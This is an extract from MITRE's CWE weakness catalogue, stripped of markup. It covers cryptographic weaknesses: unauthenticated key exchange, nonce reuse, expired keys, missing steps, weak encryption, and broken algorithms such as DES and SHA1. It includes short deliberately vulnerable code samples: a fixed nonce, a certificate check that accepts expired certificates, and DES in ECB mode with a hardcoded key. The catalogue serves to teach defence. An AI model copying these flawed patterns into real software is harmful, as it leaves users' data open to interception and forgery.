The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Maintenance_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product performs a key exchange with an actor without verifying the identity of that actor. + Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities. Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim's credentials, sniff traffic between the victim and trusted server, etc. + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + High + + + Access Control + Bypass Protection Mechanism + No authentication takes place in this process, bypassing an assumed protection of encryption. + + + Confidentiality + Read Application Data + The encrypted communication between a user and a trusted host may be subject to sniffing by any actor in the communication path. + + + + + Architecture and Design + Ensure that proper authentication is included in the system design. + + + Implementation + Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications. + + + + + Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path. Many people using SSL/TLS skip the authentication (often unknowingly). + + + + + Key exchange without entity authentication + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-10 + clarified the description + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Common_Consequences, Demonstrative_Examples, Description, References, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Nonces should be used for the present occasion and only once. + + + + + + + + Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange. + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Potentially a replay attack, in which an attacker could send the same data twice, could be crafted if nonces are allowed to be reused. This could allow a user to send a message which masquerades as a valid message from a valid user. + + + + + Implementation + Refuse to reuse nonce values. + + + Implementation + Use techniques such as requiring incrementing, time based and/or challenge response to assure uniqueness of nonces. + + + + + This code takes a password, concatenates it with a nonce, then encrypts it before sending over a network: + + void encryptAndSendPassword(char *password){char *nonce = "bad";...char *data = (unsigned char*)malloc(20);int para_size = strlen(nonce) + strlen(password);char *paragraph = (char*)malloc(para_size);SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data);sendEncryptedData(data)} + + Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password. + + + This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party: + + String command = new String("some command to execute");MessageDigest nonce = MessageDigest.getInstance("SHA");nonce.update(String.valueOf("bad nonce"));byte[] nonce = nonce.digest();MessageDigest password = MessageDigest.getInstance("SHA");password.update(nonce + "secretPassword");byte[] digest = password.digest();sendCommand(digest, command) + + Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands. + + + + + Reusing a nonce, key pair in encryption + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key. + While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength. + + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + The cryptographic key in question may be compromised, providing a malicious user with a method for authenticating as the victim. + + + + + Architecture and Design + Adequate consideration should be put in to the user interface in order to notify users previous to the key's expiration, to explain the importance of new key generation and to walk users through the process as painlessly as possible. + + + + + The following code attempts to verify that a certificate is valid. + + if (cert = SSL_get_peer_certificate(ssl)) { + foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo)) + + + //do stuff + + + + + } + + The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid. + + + + + Using a key past its expiration date + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Using a Key Past its Expiration Date + + + + The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm. + + + + + + + + + + + Implementation + Developers sometimes omit "expensive" (resource-intensive) steps in order to improve performance, especially in devices with limited memory or slower CPUs. This step may be taken under a mistaken impression that the step is unnecessary for the cryptographic algorithm. + + + + Requirements + This issue may happen when the requirements for the cryptographic algorithm are not clearly stated. + + + + + + Access Control + Bypass Protection Mechanism + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + Accountability + Non-Repudiation + Hide Activities + + + + + CVE-2001-1585 + Missing challenge-response step allows authentication bypass using public key. + https://www.cve.org/CVERecord?id=CVE-2001-1585 + + + + Cryptography + + + + Missing Required Cryptographic Step + + + A8 + Insecure Cryptographic Storage + CWE More Specific + + + A9 + Insecure Communications + CWE More Specific + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps incomplete/missing security check. + Can be resultant. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Functional_Areas, Modes_of_Introduction, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Description, Modes_of_Introduction, Name + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Required Cryptographic Step + + + + The product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. + A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources. + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Access Control + Confidentiality + Bypass Protection Mechanism + Read Application Data + An attacker may be able to decrypt the data using brute force attacks. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use an encryption scheme that is currently considered to be strong by experts in the field. + + + + + CVE-2001-1546 + Weak encryption + https://www.cve.org/CVERecord?id=CVE-2001-1546 + + + CVE-2004-2172 + Weak encryption (chosen plaintext attack) + https://www.cve.org/CVERecord?id=CVE-2004-2172 + + + CVE-2002-1682 + Weak encryption + https://www.cve.org/CVERecord?id=CVE-2002-1682 + + + CVE-2002-1697 + Weak encryption produces same ciphertext from the same plaintext blocks. + https://www.cve.org/CVERecord?id=CVE-2002-1697 + + + CVE-2002-1739 + Weak encryption + https://www.cve.org/CVERecord?id=CVE-2002-1739 + + + CVE-2005-2281 + Weak encryption scheme + https://www.cve.org/CVERecord?id=CVE-2005-2281 + + + CVE-2002-1872 + Weak encryption (XOR) + https://www.cve.org/CVERecord?id=CVE-2002-1872 + + + CVE-2002-1910 + Weak encryption (reversible algorithm). + https://www.cve.org/CVERecord?id=CVE-2002-1910 + + + CVE-2002-1946 + Weak encryption (one-to-one mapping). + https://www.cve.org/CVERecord?id=CVE-2002-1946 + + + CVE-2002-1975 + Encryption error uses fixed salt, simplifying brute force / dictionary attacks (overlaps randomness). + https://www.cve.org/CVERecord?id=CVE-2002-1975 + + + + + Weak Encryption + + + A8 + Insecure Cryptographic Storage + CWE More Specific + + + A9 + Insecure Communications + CWE More Specific + + + A8 + Insecure Storage + CWE More Specific + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-08 + Critical + Clarified entry to focus on algorithms that do not have major weaknesses, but may not be strong enough for some purposes. + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Description, Maintenance_Notes, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-06-21 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weak Encryption + + + + The product uses a broken or risky cryptographic algorithm or protocol. + + Cryptographic algorithms are the methods by which data is scrambled to prevent observation or influence by unauthorized actors. Insecure cryptography can be exploited to expose sensitive information, modify data in unexpected ways, spoof identities of other users or devices, or other impacts. + It is very difficult to produce a secure algorithm, and even high-profile algorithms by accomplished cryptographic experts have been broken. Well-known techniques exist to break or weaken various kinds of cryptography. Accordingly, there are a small number of well-understood and heavily studied algorithms that should be used by most products. Using a non-standard or known-insecure algorithm is dangerous because a determined adversary may be able to break the algorithm and compromise whatever data has been protected. + Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered "unsafe" even if it was once thought to be strong. This can happen when new attacks are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought. + For a number of reasons, this weakness is even more challenging to manage with hardware deployment of cryptographic algorithms as opposed to software implementation. First, if a flaw is discovered with hardware-implemented cryptography, the flaw cannot be fixed in most cases without a recall of the product, because hardware is not easily replaceable like software. Second, because the hardware product is expected to work for years, the adversary's computing power will only increase over time. + + + + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + With hardware, the Architecture or Design Phase might start with compliant cryptography, but it is replaced with a non-compliant crypto during the later Implementation phase due to implementation constraints (e.g., not enough entropy to make it function properly, or not enough silicon real estate available to implement). Or, in rare cases (especially for long projects that span over years), the Architecture specifications might start with cryptography that was originally compliant at the time the Architectural specs were written, but over the time it became non-compliant due to progress made in attacking the crypto. + + + High + + + Confidentiality + Read Application Data + The confidentiality of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm. + + + Integrity + Modify Application Data + The integrity of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm. + + + Accountability + Non-Repudiation + Hide Activities + If the cryptographic algorithm is used to ensure the identity of the source of the data (such as digital signatures), then a broken algorithm will compromise this scheme and the source of the data cannot be proven. + + + + + Automated Analysis + Automated methods may be useful for recognizing commonly-used libraries or features that have become obsolete. + Moderate + False negatives may occur if the tool is not aware of the cryptographic libraries in use, or if custom cryptography is being used. + + + Manual Analysis + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + Binary / Bytecode simple extractor - strings, ELF readers, etc. + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Man-in-the-middle attack tool + + Cost effective for partial coverage: + + Framework-based Fuzzer + Automated Monitored Execution + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Libraries or Frameworks + + When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis. + For example, US government systems require FIPS 140-2 certification [REF-1192]. + Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak. + Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267] + + + + Architecture and Design + Ensure that the design allows one cryptographic algorithm to be replaced with another in the next generation or version. Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. With hardware, design the product at the Intellectual Property (IP) level so that one cryptographic algorithm can be replaced with another in the next generation of the hardware product. + Defense in Depth + + + Architecture and Design + Carefully manage and protect cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography itself is irrelevant. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Industry-standard implementations will save development time and may be more likely to avoid errors that can occur during implementation of cryptographic algorithms. Consider the ESAPI Encryption feature. + + + + Implementation + Architecture and Design + When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. + + + + + These code examples use the Data Encryption Standard (DES). + + EVP_des_ecb(); + + + Cipher des=Cipher.getInstance("DES...");des.initEncrypt(key2); + + + function encryptPassword($password){$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$key = "This is a password encryption key";$encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv);return $encryptedPassword;} + + Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES). + + + Suppose a chip manufacturer decides to implement a hashing scheme for verifying integrity property of certain bitstream, and it chooses to implement a SHA1 hardware accelerator for to implement the scheme. + + The manufacturer chooses a SHA1 hardware accelerator for to implement the scheme because it already has a working SHA1 Intellectual Property (IP) that the manufacturer had created and used earlier, so this reuse of IP saves design cost. + + However, SHA1 was theoretically broken in 2005 and practically broken in 2017 at a cost of $110K. This means an attacker with access to cloud-rented computing power will now be able to provide a malicious bitstream with the same hash value, thereby defeating the purpose for which the hash was used. + This issue could have been avoided with better design. + + The manufacturer could have chosen a cryptographic solution that is recommended by the wide security community (including standard-setting bodies like NIST) and is not expected to be broken (or even better, weakened) within the reasonable life expectancy of the hardware product. In this case, the architects could have used SHA-2 or SHA-3, even if it meant that such choice would cost extra. + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple OT products used weak cryptography. + + + + + CVE-2022-30273 + SCADA-based protocol supports a legacy encryption mode that uses Tiny Encryption Algorithm (TEA) in ECB mode, which leaks patterns in messages and cannot protect integrity + https://www.cve.org/CVERecord?id=CVE-2022-30273 + + + CVE-2022-30320 + Programmable Logic Controller (PLC) uses a protocol with a cryptographically insecure hashing algorithm for passwords. + https://www.cve.org/CVERecord?id=CVE-2022-30320 + + + CVE-2008-3775 + Product uses "ROT-25" to obfuscate the password in the registry. + https://www.cve.org/CVERecord?id=CVE-2008-3775 + + + CVE-2007-4150 + product only uses "XOR" to obfuscate sensitive data + https://www.cve.org/CVERecord?id=CVE-2007-4150 + + + CVE-2007-5460 + product only uses "XOR" and a fixed key to obfuscate sensitive data + https://www.cve.org/CVERecord?id=CVE-2007-5460 + + + CVE-2005-4860 + Product substitutes characters with other characters in a fixed way, and also leaves certain input characters unchanged. + https://www.cve.org/CVERecord?id=CVE-2005-4860 + + + CVE-2002-2058 + Attackers can infer private IP addresses by dividing each octet by the MD5 hash of '20'. + https://www.cve.org/CVERecord?id=CVE-2002-2058 + + + CVE-2008-3188 + Product uses DES when MD5 has been specified in the configuration, resulting in weaker-than-expected password hashes. + https://www.cve.org/CVERecord?id=CVE-2008-3188 + + + CVE-2005-2946 + Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates. + https://www.cve.org/CVERecord?id=CVE-2005-2946 + + + CVE-2007-6013 + Product uses the hash of a hash for authentication, allowing attackers to gain privileges if they can obtain the original hash. + https://www.cve.org/CVERecord?id=CVE-2007-6013 + + + + + Using a broken or risky cryptographic algorithm + + + A8 + Insecure Storage + CWE More Specific + + + MSC30-C + Do not use the rand() function for generating pseudorandom numbers + CWE More Abstract + + + MSC32-C + Properly seed pseudorandom number generators + CWE More Abstract + + + MSC02-J + Generate strong random numbers + + + ASCSM-CWE-327 + + + Part 3-3 + Req SR 4.3 + + + Part 4-2 + Req CR 4.3 + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Common_Consequences, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-07-27 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated References + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Detection_Factors, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Maintenance_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Parbati K. Manna + Intel Corporation + 2019-12-10 + Provide a hardware-specific submission whose contents were integrated into this entry, affecting extended description, applicable platforms, demonstrative examples, and 